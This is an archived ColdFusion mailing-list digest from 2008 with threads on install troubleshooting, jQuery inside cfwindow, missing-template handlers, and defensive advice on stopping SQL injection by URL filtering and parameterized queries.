A service specific error occured 2... EXPLANATION A service specific error occured Ok, nevermind, I was hoping the real error message would get output to the screen. It appears your problem has been identified as an incomplete download, but for the record though, what I should have had you done was run this from the command line: c:\coldfusion8\runtime\bin\jrun.exe -config jvm.config -start coldfusion This gives you the same output that is placed in your C:\ColdFusion8\runtime\logs\coldfusion-out.log file which would have included the error message about jrun.jar not existing. (Note: this would be for the stand alone installation I believe) ~Brad ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310414 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Thanks for the code, I'm in the processing of cleaning all the query calls for my client and been seeing lots of posts regarding this sql injection. There are a couple thousand queries that I have to clean up but while I'm in the process of cleaning they're getting injected over and over and over!! So I did something similar to this, not as in depth, but I added some logic to application.cfm to check cgi.query_string for parts of the injection script. What I'm wondering is a the pros and cons of doing it this way. Does it slow down the app checking for this on every page hit? Or do it the old fashion way and clean up all the queries. Thoughts? -Original Message- From: Justin Scott [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! And yes, I'd like to see the URL loop script that was offered by Justin Scott I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310415 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
I must have 100,000 pages I need to protect -- and my primary database has something like 180 tables, some of which have more than 100 fields. So, I need something I can do quickly. And I got a lot to learn about this. See my previous post regarding this code which can be placed in front of an application as a stop-gap measure to give you time to patch everything properly: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310416 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
What I'm wondering is a the pros and cons of doing it this way. Does it slow down the app checking for this on every page hit? Or do it the old fashion way and clean up all the queries. Thoughts? That depends on what your definition of slow is. On a modern server a simple check for a specific string anywhere in the URL as you described isn't going to even show up in speed testing. The code I posted is more robust and takes a couple ms to run, but unless your server is getting absolutely hammered the difference in execution time shouldn't be at all noticeable. I will emphasize that the front-end URL scanning is meant as a first line of defense. It will help, but protection on individual queries and input validation should still be considered best practice going forward, and implemented on older code if time and budget permit. -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310417 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Ok guys I am up and running. I downloaded again and reinstalled Thank you ALL for your help and patience. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310418 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Installation of CF 8 (developer edition) is not working
Glad to hear that! ~Brad - Original Message - From: Torrent Girl [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Thursday, August 07, 2008 1:27 PM Subject: Re: Installation of CF 8 (developer edition) is not working Ok guys I am up and running. I downloaded again and reinstalled Thank you ALL for your help and patience. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310419 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
- Original Message - From: Bruce Schuman [EMAIL PROTECTED] I must have 100,000 pages I need to protect -- Better get started then. :) Read about two tools that can make the job easier for you: http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect Whatever stop-gaps or filtering mechanisms you put in place, your final solution needs to include parameterizing inputs to all your queries. ~Brad ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310420 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
I'd be interested in seeing this also. We have CF5 and CFMX versions if anyone wants a copy. -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310421 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: CFwindow and jquery in source
Another example: I have a global jquery field highlighter that runs for all my forms of a specific class. It also relies on the document ready. It's working for the main form, but not the form that is included by the cfwindow tag. == head script =higherlighter /head form//works ok here! input /form cfwindow source=anotherForm / //this popup doesn't get any jquery love. = So, in that instance the form on the page is working properly, but the anotherForm won't run any jQuery script that relies on the document ready. Of course, anotherForm would work if it were called directly. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310422 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Justin, Good effort... It does not check the form scope however - or CGI (a rarely used but still vulnerable scope). As has been pointed out, a blacklist function like this one will result a good number of false positives for items that are legitimate. Also note that not every DB platforms require a semi-colon for end of statement. Some of them allow for line breaks for example (at least in the default installation). -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Justin Scott [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 12:36 PM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! And yes, I'd like to see the URL loop script that was offered by Justin Scott I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310423 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: CFwindow and jquery in source
where is your script src=jquery.js/script? it needs to be in the page that creates the cfwindow... not in the page that resides in the cfwindow. On Thu, Aug 7, 2008 at 11:35 AM, Justin T [EMAIL PROTECTED]wrote: Another example: I have a global jquery field highlighter that runs for all my forms of a specific class. It also relies on the document ready. It's working for the main form, but not the form that is included by the cfwindow tag. == head script =higherlighter /head form//works ok here! input /form cfwindow source=anotherForm / //this popup doesn't get any jquery love. = So, in that instance the form on the page is working properly, but the anotherForm won't run any jQuery script that relies on the document ready. Of course, anotherForm would work if it were called directly. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310424 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: CFwindow and jquery in source
where is your script src=jquery.js/script? it needs to be in the page that creates the cfwindow... not in the page that resides in the cfwindow. On Thu, Aug 7, 2008 at 11:35 AM, Justin T [EMAIL PROTECTED]wrote: Hi Charlie, I tried it both ways, in the source document, in the caller as an import, and both. Mind you, it's only jquery that relies on the $ready that's having the issue (even my global template jquery stuff). I have tested generic jquery code to work outside of the ready initializer and that works fine. It's really like something needs to let the jquery know the source document from the get is ready in addition to the main document. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310425 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
Good effort... It does not check the form scope however - or CGI Since nearly all SQL injection attempts come through the URL (including the recent ones), that is where I put the focus. With this script I would not recommend checking the form scope as there is too high a risk of false positives. I've never heard of an injection attack coming through CGI variables. I suppose it's possible, but the percentage of queries using CGI scope data is probably minuscule compared to URL variables. As has been pointed out, a blacklist function like this one will result a good number of false positives for items that are legitimate. I would replace will with may in that statement, and then agree. We've been using this internally for years without any false positives (yet). Also note that not every DB platforms require a semi-colon for end of statement. Some of them allow for line breaks for example (at least in the default installation). Ours was designed for SQL Server; perhaps I should have pointed that out earlier. I'll reiterate against that it's not meant as a guaranteed SQL injection stopper, just a quick way to provide a first line defense while you patch up your queries properly. -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310426 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Missing Template Handler is missing
I'm trying to configure the Missing Template Handler on an old CF4.5 Unix based server. Our web shop has created a custom 404 incorporating the look and feel of our site. It's path is simply /errors/404error.htm. The apache web server has been properly configured to use this for static content 404 errors. They would also like this to be used for missing CF template errors. I put in '/errors/404error.htm' into the Missing Template Handler field in the administrator and nothing happened. I also tried it without the initial slash and still no good. What do I need to do so that ColdFusion will server up the http://www.cdpr.ca.gov/errors/404error.htm file? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310427 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: Ok guys I am up and running. I downloaded again and reinstalled Thank you ALL for your help and patience. I'll bet you will never forget to check the download numbers again. I know I don't since this happened to me a few years ago. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310428 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Missing Template Handler is missing
Have you tried everything mentioned at http://kb.adobe.com/selfservice/viewContent.do?externalId=95ee04fb ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310429 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4